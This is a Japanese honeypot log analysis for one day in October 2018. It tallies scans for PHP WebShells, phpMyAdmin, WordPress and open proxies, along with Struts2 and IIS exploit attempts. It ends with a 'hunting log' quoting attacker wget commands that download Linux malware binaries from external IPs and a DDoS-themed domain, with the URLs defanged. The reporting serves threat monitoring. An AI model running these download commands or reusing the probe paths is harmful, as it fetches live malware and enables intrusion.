ハニーポットのログ分析(2018/10/10)
WOWhoneypotの2018/10/10(水) (運用127日目)の簡易分析です。
本日の総アクセス件数は 142件です。
・phpのWebShell設置の調査:36件
・phpMyAdminの調査:1件
・(新規)ログインページの調査:1件
→以下のようなアクセスです。どんなプロダクトを狙っているかは不明です。
GET /Vip/User/Login HTTP/1.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Connection: close
以下が全アクセスログです。
| 件数 | 日付 | 種別 | リクエスト |
| 34 | 2018-10-10 | Apache Struts2の脆弱性S2-045(CVE-2017-5638)を突く攻撃 | GET /index.action |
| 30 | 2018-10-10 | アクセス | GET / |
| 25 | 2018-10-10 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 2 | 2018-10-10 | phpのWebShell設置の調査 | POST /xx.php |
| 2 | 2018-10-10 | phpのWebShell設置の調査 | POST /wuwu11.php |
| 2 | 2018-10-10 | phpのWebShell設置の調査 | POST /sheep.php |
| 2 | 2018-10-10 | phpのWebShell設置の調査 | POST /db.init.php |
| 2 | 2018-10-10 | WordPressの調査 | GET /wp-login.php |
| 2 | 2018-10-10 | 不正中継の調査 | CONNECT cn.bing.com:443 |
| 2 | 2018-10-10 | 不正中継の調査 | CONNECT 133.130.126.119:43 |
| 1 | 2018-10-10 | IISの脆弱性(CVE-2017-7269)を突く攻撃 | PROPFIND / |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | POST /xw.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | POST /w.php |
| 1 | 2018-10-10 | WordPressの調査 | POST /wp-admins.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | POST /s.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | POST /m.php?pbid=open |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | POST /db_session.init.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | POST /db__.init.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | POST /db_desql.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | POST /9678.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /z.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /x.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /wpo.php |
| 1 | 2018-10-10 | ログインの調査 | GET /Vip/User/Login |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /uploader.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /text.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /test.php |
| 1 | 2018-10-10 | クローリング | GET /robots.txt |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /muhstik.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /log.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /logon.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /license.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /lala.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /lala-dpr.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /index.php |
| 1 | 2018-10-10 | 不正中継の調査 | GET hxxp://www.ip.cn/ |
| 1 | 2018-10-10 | 不正中継の調査 | GET hxxp://www.epochtimes.com/ |
| 1 | 2018-10-10 | 不正中継の調査 | GET hxxp://www.123cha.com/ |
| 1 | 2018-10-10 | 不正中継の調査 | GET hxxp://boxun.com/ |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /help-e.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /hell.php |
| 1 | 2018-10-10 | phpMyAdminの調査 | GET /db_pma.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /cmx.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /cmv.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /cmd.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /cmdd.php |
| 1 | 2018-10-10 | phpのWebShell設置の調査 | GET /appserv.php |
| 1 | 2018-10-10 | 不正中継の調査 | CONNECT www.voanews.com:443 |
| 1 | 2018-10-10 | 不正中継の調査 | CONNECT www.baidu.com:443 |
本日のドメイン名でのアクセスは以下です。
2 GET /
1 GET /robots.txt
本日のハンティングログは以下です。
5 2018-10-10 wget -c hxxp://119.145.148.206:1024/Linux2.6
4 2018-10-10 wget -c hxxp://wap.tfddos.net:57843/linux
1 2018-10-10 wget -c hxxp://43.226.148.234:1024/Linux2.6
以上です。
